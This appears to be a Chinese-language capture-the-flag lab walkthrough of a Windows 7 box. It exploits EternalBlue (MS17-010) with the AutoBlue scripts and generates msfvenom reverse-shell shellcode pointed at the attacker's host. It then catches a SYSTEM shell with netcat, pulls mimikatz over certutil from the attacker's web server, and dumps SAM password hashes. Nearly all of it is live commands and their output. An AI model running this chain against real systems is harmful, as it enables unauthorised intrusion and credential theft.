1 扫描
看名字就知道应该是blue漏洞
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is runni
nmap扫漏洞,提示是的
C:\root> nmap -p 139,445 --script vuln 10.10.98.210
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-25 06:49 EDT
Nmap scan report for 10.10.98.210
Host is up (0.26s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp open microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
Nmap done: 1 IP address (1 host up) scanned in 26.52 seconds
C:\root>
2 blue 漏洞利用
https://github.com/3ndG4me/AutoBlue-MS17-010
测了下是win7
C:\root\exp\AutoBlue-MS17-010-master> python eternal_checker.py 10.10.98.210
[*] Target OS: Windows 7 Professional 7601 Service Pack 1
[!] The target is not patched
=== Testing named pipes ===
[*] Done
C:\root\exp\AutoBlue-MS17-010-master>
按提示生成shellcode,不用msf就是选1和1了。
C:\root\exp\AutoBlue-MS17-010-master\shellcode> ./shell_prep.sh
_.-;;-._
'-..-'| || |
'-..-'|_.-;;-._|
'-..-'| || |
'-..-'|_.-''-._|
Eternal Blue Windows Shellcode Compiler
Let's compile them windoos shellcodezzz
Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
y
LHOST for reverse connection:
10.9.23.70
LPORT you want x64 to listen on:
4444
LPORT you want x86 to listen on:
443
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
1
Type 0 to generate a staged payload or 1 to generate a stageless payload
1
Generating x64 cmd shell (stageless)...
msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=10.9.23.70 LPORT=4444
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 460 bytes
Saved as: sc_x64_msf.bin
Generating x86 cmd shell (stageless)...
msfvenom -p windows/shell_reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=10.9.23.70 LPORT=443
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Saved as: sc_x86_msf.bin
MERGING SHELLCODE WOOOO!!!
DONE
执行,选择all那个
C:\root\exp\AutoBlue-MS17-010-master> python eternalblue_exploit7.py 10.10.47.149 shellcode/sc_all.bin
shellcode size: 2203
numGroomConn: 13
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done
C:\root\exp\AutoBlue-MS17-010-master>
端口设置是x64的port收到了。成功拿到system。 如果不成功。重启靶机。多试试。这个漏洞是有些毛病,搞不好会让机器崩溃。
C:\root> nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.9.23.70] from (UNKNOWN) [10.10.47.149] 49169
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
3 拿hash
题目还要求拿hash之类的。
把mimikatz
传进去。这个是kali2020自带的。 locate mimikatz
。因为不是86,所以选择这个/usr/share/responder/tools/MultiRelay/bin/mimikatz.exe
打开自己的http服务python -m SimpleHTTPServer 80
再根据自己的目录配置,certutil
上传
C:\Windows\system32>certutil -urlcache -split -f http://10.9.23.70/mimikatz.exe mimikatz.exe
certutil -urlcache -split -f http://10.9.23.70/mimikatz.exe mimikatz.exe
**** Online ****
000000 ...
0baa00
CertUtil: -URLCache command completed successfully.
运行,sam是存储hash的地方,输入命令,就看到提取的hash了。拿去解密,或找flag。完成此台靶机。
C:\Windows\system32>C:\Windows\system32\mimikatz.exe
C:\Windows\system32\mimikatz.exe
.#####. mimikatz 2.1.1 (x64) built on Mar 29 2017 23:20:11
.## ^ ##. "A La Vie, A L'Amour"
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with 21 modules * * */
mimikatz # lsadump::sam
Domain : JON-PC
SysKey : 55bd17830e678f18a3110daf2c17d4c7
Local SID : S-1-5-21-2633577515-2458672280-487782642
SAMKey : c74ee832c5b6f4030dbbc7b51a011b1e
RID : 000001f4 (500)
User : Administrator
LM :
NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0
RID : 000001f5 (501)
User : Guest
LM :
NTLM :
RID : 000003e8 (1000)
User : Jon
LM :
NTLM : ffb43f0de35be4d9917ac0cc8ad57f8d
mimikatz #